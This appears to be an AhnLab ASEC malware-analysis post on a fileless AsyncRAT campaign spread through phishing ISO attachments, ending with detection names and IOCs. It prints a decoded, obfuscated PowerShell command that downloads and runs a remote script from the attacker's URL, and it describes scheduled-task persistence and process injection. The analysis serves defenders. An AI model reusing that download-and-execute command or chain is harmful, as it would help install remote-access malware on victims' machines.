AsyncRAT Being Distributed in Fileless Form

The ASEC analysis team has recently discovered that malicious AsyncRAT codes are being distributed in fileless form. The distributed AsyncRAT is executed in fileless form through multiple script files and is thought to be distributed as a compressed file attachment in emails. AsyncRAT is an open-source RAT malware developed with .NET that can execute various malicious activities under the command of the attacker.

The compressed file being distributed through phishing emails has an html file and executing this file will save the internal malicious data as an ISO file. ISO is an extension being used commonly in recent times by various malware.

Inside the compressed file

HTML file that generates a malicious ISO file

The generated ISO file uses file names related to receipts and invoices, and the ISO file contains VBScript and bat files.

  • File Name
    Receipt.iso
    Paid_invoice.iso
Inside ISO file (1)

Inside ISO file (2)

The VBScript executes the bat file generated alongside it and the bat file executes an obfuscated command.

VBS Code

BAT Code

The following decoded commands executes a malicious PowerShell command through cmd. The PowerShell command additionally executes another PowerShell command existing in a certain path.

  • Decoded command
    CMD.EXE /C POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$XCZM=’IEX(NEW-OBJECT NET.W’;$SYWD=’EBCLIENT).DOWNLO’;[BYTE[]];$VFDR=’TUUL(”hxxps://aga12[.]ir/ico.png”)’.REPLACE(‘TUUL’,’ADSTRING’);[BYTE[]];IEX($XCZM+$SYWD+$VFDR)

A portion of the additional PowerShell command looks as below and serves the feature where, after generating a total of 5 script files, executes them. See the list and figures below for features of the 5 generated scripts.

Additional PowerShell command (1)

Additional PowerShell command (2)

1. C:\ProgramData\Express\xx.vbs

xx.vbs code

This is the first script file executed after the 5 scripts are generated. This script executes the file C:\ProgramData\Express\xx.bat generated alongside it.

2. C:\ProgramData\Express\xx.bat

xx.bat code

This script has the feature of registering the file C:\ProgramData\Express\Cotrl.vbs on the task scheduler. The files registered on the scheduler are set to be run every 3 minutes.

3. C:\ProgramData\Express\Cotrl.vbs

Cotrl.vbs

This script executes the file C:\ProgramData\Express\ Cotrl.vbs.

4. C:\ProgramData\Express\Cotrl.bat

Cotrl.bat code

This script force closes the PowerShell process and executes the file C:\ProgramData\Express\Cotrl.ps1.

5. C:\ProgramData\Express\Cotrl.ps1

Cotrl.ps1 code (1)

Cotrl.ps1 code (2)

This script, which is the last to be executed, is the one that performs the actual malicious behavior. The script contains 2 pieces of malicious data, and these are Loader and AsyncRAT respectively. The first data which performs the role of Loader is loaded and the corresponding data’s GIT.local Execute method is run. Here, the path “C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe” and the second data (AsyncRAT) are transmitted as factors.

The Execute method of GIT.local is as below and using the path and malicious data transmitted as factors, performs an injection on a normal process (C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe).

Loader

Injection

The injected data is AsyncRAT and is an open-source malicious RAT code published on GitHub. It receives commands from the attacker through C2 and can perform various malicious behaviors and most malicious actions are performed through the transmitted plugin. The default features include Anti-VM, keylogging and remote shell.

  • C2
    vrln200.duckdns[.]org:6666
C2 Decryption

Anti VM

There has been an recent increase in the distribution of malware through ISO files. Moreover, the malware is being executed in fileless format, making it difficult for users to identify what type of malware was executed. Users should refrain from opening files from unknown sources and must run regular checkups on their PC.

[File Detection]
Dropper/HTML.Generic (2022.08.11.03)
Trojan/PowerShell.Loader (2022.08.18.00)
Dropper/ISO.Agent (2022.08.18.00)
Trojan/BAT.Runner (2022.08.18.00)
Downloader/BAT.Generic (2022.08.18.00)
Trojan/VBS.Runner (2022.08.18.00)

[IOC]
9e0d553e520083e2f90a8e3bb524f417
ac64ee0dea61fb0f596e3296f91462e5
f45ea3dc3e06583d49ac40833873006f
309d105bf0542574a9324f568b176021
ce77a7fb92d52727c19aca72d904abdc
752d899ee21cbdd31126e205b5840286
e0b62836b48a842f732c51857d37dbd8
448516ed6b6ef06865afbc775cd80bed
43ff49fbde6f4391891cf2a46b406da4
c840c0438f2fae0ddda74a43411a9b01
2a1082f25edff1dc5383239b1b012179
hxxps://aga12[.]ir/ico.png
vrln200.duckdns[.]org:6666

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

Categories:Malware Information

Tagged as:, ,

0 0 votes
Article Rating
guest
0 Comments
Inline Feedbacks
View all comments